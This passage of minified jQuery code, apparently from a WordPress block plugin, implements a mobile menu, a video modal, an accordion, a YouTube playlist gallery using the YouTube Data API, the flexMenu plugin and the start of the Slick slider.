.ultp-menu-item-label-container .ultp-menu-item-label-text").html()),"mv_dissolve"==a?s.find("> *").animate({opacity:.2},c,(function(){s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),s.find("> *").css("opacity",".1"),s.find("> *").animate({opacity:1},c)})):(s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),s.find("> *").css({opacity:".1",transform:"translateX(100%)",transition:`transform ${c/1e3+"s"} ease`}),s.find("> *").animate({opacity:.3},10,(function(){s.find("> *").css({opacity:"1",transform:"translateX(0px)"})})))}}}else if("back"==i){if(0==h.length)return;u=h.pop()||"";let e="";if(0==h.length?(e=t(l).find("> .ultp-menu-wrapper > .ultp-menu-content").html(),o.html(p),t(l).find(".ultp-mv-back-label-con").addClass("ultpmenu-dnone")):t("."+u).hasClass("wp-block-ultimate-post-menu-item")&&(e=t("."+u).hasClass("hasListMenuChild")?t(l).find("."+u).find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu > .ultp-list-menu-wrapper > .ultp-list-menu-content").html():t(l).find("."+u).find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").html()),e){let i=t("<div>").html(e);i.find(".wp-block-ultimate-post-menu").addClass("ultp-mobile-menu"),e=i.html(),e=g({type:"back",_string:e}),o.html(t(l).find("."+u).find("> .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text").html()),"mv_dissolve"==a?(s.find("> *").animate({opacity:.2},c,(function(){s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e)})),s.find("> *").animate({opacity:1},c)):(s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),s.find("> *").css({opacity:".1",transform:"translateX(-100%)",transition:`transform ${c/1e3+"s"} ease`}),s.find("> *").animate({opacity:.3},10,(function(){s.find("> *").css({opacity:"1",transform:"translateX(0px)"})})))}}}function b(e,i){const s=t(e.target).closest(".wp-block-ultimate-post-menu-item");let o,l,n="next";if(s.hasClass("ultp-menu-res-css")?n="back":s.addClass("ultp-menu-res-css"),"next"==n){s.addClass("ultp-hammenu-accordian-active"),d&&s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-dropdown").html(d),o=s.hasClass("hasListMenuChild")?s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu > .ultp-list-menu-wrapper > .ultp-list-menu-content"):s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content"),o.length||(o=s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content")),l=o.outerHeight();const e=s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content"),i=e.css("padding-top"),n=e.css("padding-bottom");s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").html(o.html()),s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").css({height:"0px","padding-top":"0","padding-bottom":"0"}),s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").animate({height:l+"px","padding-top":i,"padding-bottom":n},c,(function(){t(this).css({height:"","padding-top":"","padding-bottom":""})}))}else"back"==n&&(s.removeClass("ultp-hammenu-accordian-active"),s.find(".wp-block-ultimate-post-menu-item").removeClass("ultp-hammenu-accordian-active"),s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").animate({height:"0",paddingTop:"0",paddingBottom:"0"},c,(function(){t(this).css({height:"",paddingTop:"",paddingBottom:""}),r&&s.find(".ultp-menu-item-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown").each((function(){t(this).html()&&t(this).html(r)})),s.removeClass("ultp-menu-res-css"),s.find(".wp-block-ultimate-post-menu-item").removeClass("ultp-menu-res-css")})))}i&&(t(".wp-block-ultimate-post-menu").each((function(){const e=t(this);"hasRootMenu"!=e.data("hasrootmenu")&&e.find(`.ultp-menu-item-wrapper[data-parentbid=".ultp-block-${e?.data("bid")}"] > .ultp-menu-item-label-container a`).each((function(){const i=t(this),s=window.location.href;let o=!1;const l=i[0].href;if(s.endsWith("/")&&!l.endsWith("/")){const t=l+"/";s.replace("https:","http:")==t.replace("https:","http:")&&(o=!0)}(s.replace("https:","http:")==l.replace("https:","http:")||o)&&i.closest(`.ultp-menu-item-wrapper[data-parentbid=".ultp-block-${e?.data("bid")}"]`).addClass("ultp-current-link")}))})),t(document).on("click",'.wp-block-ultimate-post-menu[data-mv="enable"] > .ultp-mv-ham-icon.ultp-active',(function(t){m(t,"ham")})),t(document).on("click",".ultp-mobile-view-container .ultp-mv-back, .ultp-mobile-view-container .ultp-mv-back-label-con",(function(t){"mv_dissolve"==a||"mv_slide"==a?v(t,"back"):b(t,"back")})),t(document).on("click",".ultp-mobile-view-container .ultp-mv-close",(function(t){m(t,"close")})),t(document).on("click",".ultp-mobile-view-container",(function(e){t(e.target).hasClass("ultp-mobile-view-container")&&m(e,"close")})),t(document).on("click",".ultp-mobile-view-container .ultp-menu-item-label-container",(function(e){t(e.target).is(".ultp-menu-item-label")||t(e.target).parent().is(".ultp-menu-item-label")||t(e.target).is(".ultp-menu-item-label-container")&&0==t(e.target).siblings(".ultp-menu-item-content").find("> *").length||(e.preventDefault(),"mv_dissolve"==a||"mv_slide"==a?v(e,"next"):b(e,"next"))})))}(jQuery),function(t){function e(){if(t(".ultp-video-modal.modal_active").length>0){let e=t(".ultp-video-modal.modal_active").find("iframe");if(e.length){const t=e.attr("src");if(t){let i="";i=t.includes("dailymotion.com/player")?t.replaceAll("&?autoplay=1","?autoplay=0"):t.replaceAll("&autoplay=1",""),i&&e.attr("src",i)}}else t(".ultp-video-modal.modal_active").find("video").trigger("pause");t(".ultp-video-modal").removeClass("modal_active")}}t(document).on("click",".ultp-video-icon",(function(){const e=t(this),i=e.parents(".ultp-block-item"),s=e.closest(".ultp-block-image"),o=s.find("div.ultp-block-video-content");let l=i.find(".ultp-video-icon").attr("enableAutoPlay"),n=i.find(".ultp-video-icon").attr("enableVideoPopup"),a=i.find("iframe");const r=o.find("iframe").length>0,d=o.find("video").length>0;if(n||!r&&!d||(s.find("> a img").hide(),o.css({display:"block"}),e.hide(),(r||d)&&(a=o.find("iframe").length>0?o.find("iframe"):o.find("video"),d&&l&&o.find("video").trigger("play"))),a.length){i.find(".ultp-video-modal").addClass("modal_active");const e=a.attr("src");e&&l&&(e.includes("dailymotion.com/player")?a.attr("src",e.includes("?autoplay=0")?e.replace("?autoplay=0","&?autoplay=1"):`${e}?autoplay=1`):a.attr("src",`${e}&autoplay=1`)),a.on("load",(function(){t(".ultp-loader-container").hide()}))}else i.find(".ultp-video-modal").addClass("modal_active"),t(".ultp-video-modal.modal_active").find("video").trigger("play")})),t(document).on("click",".ultp-video-close",(function(){e()})),t(document).on("keyup",(function(t){"Escape"==t.key&&e()}))}(jQuery),function(t){0==t("body.postx-admin-page").length&&t(".wp-block-ultimate-post-accordion").length>0&&t(".wp-block-ultimate-post-accordion").each((function(){const e=t(this).data("active"),i=t(this).data("autocollapse");t(this).children().children(".wp-block-ultimate-post-accordion-item").each((function(s){const o=t(this);s==e?(t(this).addClass("active active-accordion"),o.find(".ultp-accordion-item__content").first().css({display:"block"})):t(this).removeClass("active active-accordion"),t(this).children(".ultp-accordion-item").children(".ultp-accordion-item__navigation").on("click",(function(){const e=t(this).parent().parent(".wp-block-ultimate-post-accordion-item"),s=e.find(".ultp-accordion-item__content").first(),o=e.parent().parent(".wp-block-ultimate-post-accordion");s.is(":visible")?s.stop(!0,!0).slideUp(300,(function(){e.removeClass("active active-accordion")})):(i&&o.find(".ultp-accordion-item__content:visible").first().stop(!0,!0).slideUp(300,(function(){e.siblings().removeClass("active active-accordion"),e.addClass("active active-accordion")})),e.addClass("active active-accordion"),s.stop(!0,!0).slideDown(300))}))}))}))}(jQuery),function(t){t(document).ready((function(){!function(){function e(t,e){if("string"==typeof t)try{return JSON.parse(t)}catch(t){return e}return"object"==typeof t&&null!==t?t:e}function i(e,i){if(!e)return"";const s=t(window).width();let o;return o=s<600?i.sm||i.lg:s<900&&i.md||i.lg,e.length>o?e.substring(0,o)+"...":e}function s(t,e){const i=[...t];switch(e){case"title":return i.sort(((t,e)=>t.title.localeCompare(e.title,void 0,{sensitivity:"base"})));case"latest":return i.sort(((t,e)=>new Date(e.publishedAt).getTime()-new Date(t.publishedAt).getTime()));case"date":return i.sort(((t,e)=>new Date(t.publishedAt).getTime()-new Date(e.publishedAt).getTime()));case"popular":return i.sort(((t,e)=>(e.viewCount||0)-(t.viewCount||0)));default:return t}}function o(t){if(!t)return"";try{const e=new URL(t);if("www.youtube.com"===e.hostname){if(e.pathname.startsWith("/channel/"))return e.pathname.split("/channel/")[1];if(e.pathname.startsWith("/@"))return e.pathname.substring(2);if(e.searchParams.get("list"))return e.searchParams.get("list")}return t}catch(e){return t}}function l(e,i,s){t.get(`https://www.googleapis.com/youtube/v3/search?part=snippet&q=${encodeURIComponent(e)}&type=channel&key=${i}`).done((function(t){t.items&&t.items.length>0?s(t.items[0].snippet.channelId):s(null)})).fail((function(){s(null)}))}function n(t,e){return`\n\t\t\t\t<div class="ultp-ytg-video-wrapper">\n\t\t\t\t\t<iframe \n\t\t\t\t\t\tsrc="https://www.youtube.com/embed/${t}?${["autoplay="+(e.autoplay?"1":"0"),"loop="+(e.loop?"1":"0"),"mute="+(e.mute?"1":"0"),"controls="+(e.showPlayerControl?"1":"0"),"modestbranding="+(e.hideYoutubeLogo?"1":"0"),e.loop?`playlist=${t}`:null].filter(Boolean).join("&")}"\n\t\t\t\t\t\ttitle="YouTube Video"\n\t\t\t\t\t\tframeborder="0"\n\t\t\t\t\t\tallow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"\n\t\t\t\t\t\tallowfullscreen\n\t\t\t\t\t></iframe>\n\t\t\t\t</div>\n\t\t\t`}function a(t,e,s,o,l,n,a){let r='<div class="ultp-ytg-content">';return t&&(r+=`<div class="ultp-ytg-title"><a href="https://www.youtube.com/watch?v=${a}" target="_blank" rel="noopener noreferrer">${i(e,s)}</a></div>`),o&&(r+=`<div class="ultp-ytg-description">${i(l,n)}</div>`),r+="</div>",r}t(".wp-block-ultimate-post-youtube-gallery").each((function(){const r=t(this),d=r.find(".ultp-block-wrapper");let c=r.find(".ultp-ytg-view-grid, .ultp-ytg-container");const p=r.find(".ultp-ytg-loadmore-btn"),u={playlistIdOrUrl:r.data("playlist")||"",apiKey:r.data("api-key")||"",cacheDuration:parseInt(r.data("cache-duration"))||0,sortBy:r.data("sort-by")||"date",galleryLayout:r.data("gallery-layout")||"grid",videosPerPage:e(r.data("videos-per-page"),{lg:9,md:6,sm:3}),showVideoTitle:"1"==r.data("show-video-title"),videoTitleLength:e(r.data("video-title-length"),{lg:50,md:50,sm:50}),loadMoreEnable:"1"==r.data("load-more-enable"),moreButtonLabel:r.data("more-button-label")||"More Videos",autoplay:"1"==r.data("autoplay"),loop:"1"==r.data("loop"),mute:"1"==r.data("mute"),showPlayerControl:"1"==r.data("show-player-control"),hideYoutubeLogo:"1"==r.data("hide-youtube-logo"),showDescription:"1"==r.data("show-description"),videoDescriptionLength:e(r.data("video-description-length"),{lg:100,md:100,sm:100}),imageHeightRatio:r.data("image-height-ratio")||"16-9",galleryColumn:e(r.data("gallery-column"),{lg:3,md:2,sm:1}),displayType:r.data("display-type")||"grid",enableListView:"1"==r.data("enable-list-view"),enableIconAnimation:"1"==r.data("enable-icon-animation"),defaultYoutubeIcon:"1"==r.data("enable-youtube-icon"),imgHeight:r.data("img-height")};let h=o(u.playlistIdOrUrl);if(h.startsWith("@")){l(h.substring(1),u.apiKey,(function(t){t?(h=t,f(h)):d.html('<p style="color:#888">Invalid handle or API key.</p>')}))}else f(h);function f(e){if(e.startsWith("UC")&&(e="UU"+e.substring(2)),!e||!u.apiKey)return void d.html('<p style="color:#888">Please provide both YouTube playlist ID/URL and API key.</p>');let o=[],l=u.videosPerPage.lg||9,h=null,f=null;function m(){const e=t(window).width();l=e<600?Math.max(l,u.videosPerPage.sm||3):e<900?Math.max(l,u.videosPerPage.md||6):Math.max(l,u.videosPerPage.lg||9)}function g(t){if(!t.length)return void c.html("<p>No videos found in this playlist.</p>");h||(h=t[0]);let e='<div class="ultp-ytg-main">';const s=`\n\t\t\t\t\t\t<div class="ultp-ytg-video-wrapper">\n\t\t\t\t\t\t\t<iframe \n\t\t\t\t\t\t\t\tsrc="https://www.youtube.com/embed/${h.videoId}?${["autoplay="+(u.autoplay?"1":"0"),"loop="+(u.loop?"1":"0"),"mute="+(u.mute?"1":"0"),"controls="+(u.showPlayerControl?"1":"0"),"modestbranding="+(u.hideYoutubeLogo?"1":"0"),u.loop?`playlist=${h.videoId}`:null].filter(Boolean).join("&")}"\n\t\t\t\t\t\t\t\ttitle="YouTube Video"\n\t\t\t\t\t\t\t\tframeborder="0"\n\t\t\t\t\t\t\t\tallow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"\n\t\t\t\t\t\t\t\tallowfullscreen\n\t\t\t\t\t\t\t></iframe>\n\t\t\t\t\t\t\t${a(u.showVideoTitle,h.title,u.videoTitleLength,u.showDescription,h.description,u.videoDescriptionLength,h.videoId)}\n\t\t\t\t\t\t</div>\n\t\t\t\t\t`;e+=s,e+="</div>",e+='<div class="ultp-ytg-playlist-sidebar">',e+='<div class="ultp-ytg-playlist-items">',t.forEach((function(t){const s=t.videoId===h.videoId;e+=`\n\t\t\t\t\t\t\t<div class="ultp-ytg-playlist-item ${s?"active":""}" data-video-id="${t.videoId}">\n\t\t\t\t\t\t\t\t<img src="${t.thumbnail}" alt="${t.title}" loading="lazy" />\n\t\t\t\t\t\t\t\t<div class="ultp-ytg-playlist-item-content">\n\t\t\t\t\t\t\t\t\t<div class="ultp-ytg-playlist-item-title">\n\t\t\t\t\t\t\t\t\t\t${i(t.title,u.videoTitleLength)}\n\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t`})),e+="</div></div>",c.html(e)}function v(e,i){if(!e.length)return void c.html("<p>No videos found in this playlist.</p>");const s=e.slice(0,i);let o="";s.forEach((function(e){const i=f===e.videoId;if(o+=`<div class="ultp-ytg-item${i?" active":""}">`,o+='<div class="ultp-ytg-video">',i)o+=n(e.videoId,u);else{const i=t(".ultp-ytg-play__icon").html();o+=`\n\t\t\t\t\t\t\t\t<img src="${e.thumbnail}" alt="${e.title}" loading="lazy" data-video-id="${e.videoId}" style="cursor:pointer;" />\n\t\t\t\t\t\t\t\t<div class="ultp-ytg-play__icon${u.enableIconAnimation?" ytg-icon-animation":""}">\n\t\t\t\t\t\t\t\t\t${i}\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t`}o+="</div>",o+='<div class="ultp-ytg-inside">',o+=a(u.showVideoTitle,e.title,u.videoTitleLength,u.showDescription,e.description,u.videoDescriptionLength,e.videoId),o+="</div></div>"})),c.html(o),u.loadMoreEnable&&i<e.length?p.show():p.hide()}function b(t,e){"playlist"===u.galleryLayout?g(t):v(t,e)}const w=`ultp_youtube_gallery_${e}_${u.apiKey}_${u.sortBy}_${u.imgHeight}`,y=u.cacheDuration;let k=null;try{k=JSON.parse(localStorage.getItem(w))}catch(t){k=null}const x=Date.now();k&&k.data&&k.timestamp&&y>0&&x-k.timestamp<1e3*y?(o=s(k.data,u.sortBy),b(o,l)):("playlist"!==u.galleryLayout?c.html('\n\t\t\t\t\t\t\t<div class="ultp-ytg-loading gallery-postx gallery-active">\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t'):c.html('\n\t\t\t\t\t\t\t<div class="ultp-ytg-loading ultp-ytg-playlist-loading">\n\t\t\t\t\t\t\t\t<div class="ytg-loader"></div>\n\t\t\t\t\t\t\t</div>'),t.get("https://www.googleapis.com/youtube/v3/playlistItems",{part:"snippet",maxResults:50,playlistId:e,key:u.apiKey}).done((function(e){setTimeout((function(){if(c.empty(),e.error)return void c.html(`<div class="ultp-ytg-error">${e.error.message||"Failed to fetch playlist."}</div>`);const i=(e.items||[]).filter((function(t){return"Private video"!==t.snippet.title&&"Deleted video"!==t.snippet.title})).map((function(t){return{videoId:t.snippet.resourceId.videoId,title:t.snippet.title,thumbnail:t.snippet.thumbnails&&t.snippet.thumbnails[u.imgHeight]&&t.snippet.thumbnails[u.imgHeight].url||t.snippet.thumbnails[u.imgHeight].url||t.snippet.thumbnails?.medium?.url||"",publishedAt:t.snippet.publishedAt||"",description:t.snippet.description||"",viewCount:0}}));if("popular"===u.sortBy){const e=i.map((t=>t.videoId)).join(",");t.get(`https://www.googleapis.com/youtube/v3/videos?part=statistics&id=${e}&key=${u.apiKey}`).done((function(t){if(t.items){const e={};t.items.forEach((function(t){e[t.id]=t.statistics.viewCount})),i.forEach((function(t){t.viewCount=parseInt(e[t.videoId]||0)}))}if(o=s(i,u.sortBy),y>0)try{localStorage.setItem(w,JSON.stringify({data:i,timestamp:x}))}catch(t){console.warn("Failed to cache videos:",t)}b(o,l)})).fail((function(){console.warn("Failed to fetch video statistics for popular sorting."),o=s(i,u.sortBy),b(o,l)}))}else{if(o=s(i,u.sortBy),y>0)try{localStorage.setItem(w,JSON.stringify({data:i,timestamp:x}))}catch(t){console.warn("Failed to cache videos:",t)}b(o,l)}}),2e3)})).fail((function(){setTimeout((function(){c.empty(),c.html('<div class="ultp-ytg-error">Failed to fetch videos. Please try again.</div>')}),3e3)}))),r.on("click",".ultp-ytg-playlist-item",(function(){const e=t(this).data("video-id");e&&(h=o.find((function(t){return t.videoId===e})),h&&g(o))})),r.on("click",".ultp-ytg-play__icon",(function(){const e=t(this).siblings("img[data-video-id]").data("video-id");if(!e)return;const i=t(this).closest(".ultp-ytg-item");i.find(".ultp-ytg-video").html('<div class="ultp-ytg-loading"><div class="ytg-loader"></div></div>'),i.addClass("active").siblings(".ultp-ytg-item").removeClass("active"),setTimeout((function(){f=e,v(o,l)}),1e3)})),r.on("click",".ultp-ytg-video img[data-video-id]",(function(){const e=t(this).data("video-id");e&&(f=e,v(o,l))})),p.on("click",(function(){l+=u.videosPerPage.lg,v(o,l)})),t(window).on("resize",(function(){o.length&&(m(),b(o,l))}))}}))}()}))}(jQuery),function(t){"function"==typeof define&&define.amd?define(["jquery"],t):t(jQuery)}((function(t){var e,i=t(window).width(),s=t(window).height(),o=[];t(window).on("resize",(function(){clearTimeout(e),e=setTimeout((function(){t(window).width()===i&&t(window).height()===s||(t(o).each((function(){t(this).flexMenu({undo:!0}).flexMenu(this.options)})),i=t(window).width(),s=t(window).height())}),200)})),t.fn.flexMenu=function(e){var i,s=t.extend({threshold:2,cutoff:2,linkText:"More",linkTitle:"View More",linkTextAll:"Menu",linkTitleAll:"Open/Close Menu",shouldApply:function(){return!0},showOnHover:!0,popupAbsolute:!0,popupClass:"",undo:!1},e);return this.options=s,(i=t.inArray(this,o))>=0?o.splice(i,1):o.push(this),this.each((function(){var e,i,o,l,n,a,r=t(this),d=r.find("> li"),c=d.first(),p=d.last(),u=d.length,h=Math.floor(c.offset().top),f=Math.floor(c.outerHeight(!0)),m=!1;function g(t){return Math.ceil(t.offset().top)>=h+f}if(g(p)&&u>s.threshold&&!s.undo&&r.is(":visible")&&s.shouldApply()){var v=t('<ul class="flexMenu-popup" style="display:none;'+(s.popupAbsolute?" position: absolute;":"")+'"></ul>');for(v.addClass(s.popupClass),a=u;a>1;a--){if(i=g(e=r.find("> li:last-child")),a-1<=s.cutoff){t(r.children().get().reverse()).appendTo(v),m=!0;break}if(!i)break;e.appendTo(v)}m?r.append('<li class="flexMenu-viewMore flexMenu-allInPopup"><a href="#" title="'+s.linkTitleAll+'">'+s.linkTextAll+"</a></li>"):r.append('<li class="flexMenu-viewMore"><a href="#" title="'+s.linkTitle+'">'+s.linkText+"</a></li>"),g(o=r.find("> li.flexMenu-viewMore"))&&r.find("> li:nth-last-child(2)").appendTo(v),v.children().each((function(t,e){v.prepend(e)})),o.append(v),r.find("> li.flexMenu-viewMore > a").on("click",(function(e){var i;i=o,t("li.flexMenu-viewMore.active").not(i).removeClass("active").find("> ul").hide(),v.toggle(),o.toggleClass("active"),e.preventDefault()})),s.showOnHover&&"undefined"!=typeof Modernizr&&!Modernizr.touch&&o.hover((function(){v.show(),t(this).addClass("active")}),(function(){v.hide(),t(this).removeClass("active")}))}else if(s.undo&&r.find("ul.flexMenu-popup")){for(l=(n=r.find("ul.flexMenu-popup")).find("li").length,a=1;a<=l;a++)n.find("> li:first-child").appendTo(r);n.remove(),r.find("> li.flexMenu-viewMore").remove()}}))}})),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof exports?module.exports=t(require("jquery")):t(jQuery)}((function(t){"use strict";var e,i=window.Slick||{};e=0,(i=function(i,s){var o,l=this;l.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:t(i),appendDots:t(i),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,i){return t('<button type="button" />').text(i+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:1,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:!1,touchMove:!0,touchThreshold:5,useCSS:!0,useTransform:!0,variableWidth:!1,vertical:!1,verticalSwiping:!1,waitForAnimate:!0,zIndex:1e3},l.initials={animating:!1,dragging:!1,autoPlayTimer:null,currentDirection:0,currentLeft:null,currentSlide:0,direction:1,$dots:null,listWidth:null,listHeight:null,loadIndex:0,$nextArrow:null,$prevArrow:null,scrolling:!1,slideCount:null,slideWidth:null,$slideTrack:null,$slides:null,sliding:!1,slideOffset:0,swipeLeft:null,swiping:!1,$list:null,touchObject:{},transformsEnabled:!1,unslicked:!1},t.extend(l,l.initials),l.activeBreakpoint=null,l.animType=null,l.animProp=null,l.breakpoints=[],l.breakpointSettings=[],l.cssTransitions=!1,l.focussed=!1,l.interrupted=!1,l.hidden="hidden",l.paused=!0,l.positionProp=null,l.respondTo=null,l.rowCount=1,l.shouldClick=!0,l.$slider=t(i),l.$slidesCache=null,l.transformType=null,l.transitionType=null,l.visibilityChange="visibilitychange",l.windowWidth=0,l.windowTimer=null,o=t(i).data("slick")||{},l.options=t.extend({},l.defaults,s,o),l.currentSlide=l.options.initialSlide,l.originalSettings=l.options,void 0!==document.mozHidden?(l.hidden="mozHidden",l.visibilityChange="mozvisibilitychange"):void 0!==document.webkitHidden&&(l.hidden="webkitHidden",l.visibilityChange="webkitvisibilitychange"),l.autoPlay=t.proxy(l.autoPlay,l),l.autoPlayClear=t.proxy(l.autoPlayClear,l),l.autoPlayIterator=t.proxy(l.autoPlayIterator,l),l.changeSlide=t.proxy(l.changeSlide,l),l.clickHandler=t.proxy(l.clickHandler,l),l.selectHandler=t.proxy(l.selectHandler,l),l.setPosition=t.proxy(l.setPosition,l),l.swipeHandler=t.proxy(l.swipeHandler,l),l.dragHandler=t.proxy(l.dragHandler,l),l.keyHandler=t.proxy(l.keyHandler,l),l.instanceUid=e++,l.htmlExpr=/^(?:\s*(<[\w\W]+>)[^>]*)$/,l.registerBreakpoints(),l.init(!0)}).prototype.activateADA=function(){this.$slideTrack.find(".slick-active").attr({"aria-hidden":"false"}).find("a, input, button, select").attr({tabindex:"0"})},i.prototype.addSlide=i.prototype.slickAdd=function(e,i,s){var o=this;if("boolean"==typeof i)s=i,i=null;else if(i<0||i>=o.slideCount)return!1;o.unload(),"number"==typeof i?0===i&&0===o.$slides.length?t(e).appendTo(o.$slideTrack):s?t(e).insertBefore(o.$slides.eq(i)):t(e).insertAfter(o.$slides.eq(i)):!0===s?t(e).prependTo(o.$slideTrack):t(e).appendTo(o.$slideTrack),o.$slides=o.$slideTrack.children(this.options.slide),o.$slideTrack.children(this.options.slide).detach(),o.$slideTrack.append(o.$slides),o.$slides.each((function(e,i){t(i).attr("data-slick-index",e)})),o.$slidesCache=o.$slides,o.reinit()},i.prototype.animateHeight=function(){var t=this;if(1===t.options.slidesToShow&&!0===t.options.adaptiveHeight&&!1===t.options.vertical){var e=t.$slides.eq(t.currentSlide).outerHeight(!0);t.$list.animate({height:e},t.options.speed)}},i.prototype.animateSlide=function(e,i){var s={},o=this;o.animateHeight(),!0===o.options.rtl&&!1===o.options.vertical&&(e=-e),!1===o.transformsEnabled?!1===o.options.vertical?o.$slideTrack.animate({left:e},o.options.speed,o.options.easing,i):o.$slideTrack.animate({top:e},o.options.speed,o.options.easing,i):!1===o.cssTransitions?(!0===o.options.rtl&&(o.currentLeft=-o.currentLeft),t({animStart:o.currentLeft}).animate({animStart:e},{duration:o.options.speed,easing:o.options.easing,step:function(t){t=Math.ceil(t),!1===o.options.vertical?(s[o.animType]="translate("+t+"px, 0px)",o.$slideTrack.css(s)):(s[o.animType]="translate(0px,"+t+"px)",o.$slideTrack.css(s))},complete:function(){i&&i.call()}})):(o.applyTransition(),e=Math.ceil(e),!1===o.options.vertical?s[o.animType]="translate3d("+e+"px, 0px, 0px)":s[o.animType]="translate3d(0px,"+e+"px, 0px)",o.$slideTrack.css(s),i&&setTimeout((function(){o.disableTransition(),i.call()}),o.options.speed))},i.prototype.getNavTarget=function(){var e=this.options.asNavFor;return e&&null!==e&&(e=t(e).not(this.$slider)),e},i.prototype.asNavFor=function(e){var i=this.getNavTarget();null!==i&&"object"==typeof i&&i.each((function(){var i=t(this).slick("getSlick");i.unslicked||i.slideHandler(e,!0)}))},i.prototype.applyTransition=function(t){var e=this,i={};!1===e.options.fade?i[e.transitionType]=e.transformType+" "+e.options.speed+"ms "+e.options.cssEase:i[e.transitionType]="opacity "+e.options.speed+"ms "+e.options.cssEase,!1===e.options.fade?e.$slideTrack.css(i):e.$slides.eq(t).css(i)},i.prototype.autoPlay=function(){var t=this;t.autoPlayClear(),t.slideCount>t.options.slidesToShow&&(t.autoPlayTimer=setInterval(t.autoPlayIterator,t.options.autoplaySpeed))},i.prototype.autoPlayClear=function(){this.autoPlayTimer&&clearInterval(this.autoPlayTimer)},i.prototype.autoPlayIterator=function(){var t=this,e=t.currentSlide+t.options.slidesToScroll;t.paused||t.interrupted||t.focussed||(!1===t.options.infinite&&(1===t.direction&&t.currentSlide+1===t.slideCount-1?t.direction=0:0===t.direction&&(e=t.currentSlide-t.options.slidesToScroll,t.currentSlide-1==0&&(t.direction=1))),t.slideHandler(e))},i.prototype.buildArrows=function(){var e=this;!0===e.options.arrows&&(e.$prevArrow=t(e.options.prevArrow).addClass("slick-arrow"),e.$nextArrow=t(e.options.nextArrow).addClass("slick-arrow"),e.slideCount>e.options.slidesToShow?(e.$prevArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.$nextArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.prependTo(e.options.appendArrows),e.htmlExpr.test(e.options.nextArrow)&&e.$nextArrow.appendTo(e.options.appendArrows),!0!==e.options.infinite&&e.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true")):e.$prevArrow.add(e.$nextArrow).addClass("slick-hidden").attr({"aria-disabled":"true",tabindex:"-1"}))},i.prototype.buildDots=function(){var e,i,s=this;if(!0===s.options.dots&&s.slideCount>s.options.slidesToShow){for(s.$slider.addClass("slick-dotted"),i=t("<ul />").addClass(s.options.dotsClass),e=0;e<=s.getDotCount();e+=1)i.append(t("<li />").append(s.options.customPaging.call(this,s,e)));s.$dots=i.appendTo(s.options.appendDots),s.$dots.find("li").first().addClass("slick-active")}},i.prototype.buildOut=function(){var e=this;e.$slides=e.$slider.children(e.options.slide+":not(.slick-cloned)").addClass("slick-slide"),e.slideCount=e.$slides.length,e.$slides.each((function(e,i){t(i).attr("data-slick-index",e).data("originalStyling",t(i).attr("style")||"")})),e.$slider.addClass("slick-slider"),e.$slideTrack=0===e.slideCount?t('<div class="slick-track"/>').appendTo(e.$slider):e.$slides.wrapAll('<div class="slick-track"/>').parent(),e.$list=e.$slideTrack.wrap('<div class="slick-list"/>').parent(),e.$slideTrack.css("opacity",0),!0!==e.options.centerMode&&!0!==e.options.swipeToSlide||(e.options.slidesToScroll=1),t("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading"),e.setupInfinite(),e.buildArrows(),e.buildDots(),e.updateDots(),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),!0===e.options.draggable&&e.$list.addClass("draggable")},i.prototype.buildRows=function(){var t,e,i,s,o,l,n,a=this;if(s=document.createDocumentFragment(),l=a.$slider.children(),a.options.rows>0){for(n=a.options.slidesPerRow*a.options.rows,o=Math.ceil(l.length/n),t=0;t<o;t++){var r=document.createElement("div");for(e=0;e<a.options.rows;e++){var d=document.createElement("div");for(i=0;i<a.options.slidesPerRow;i++){var 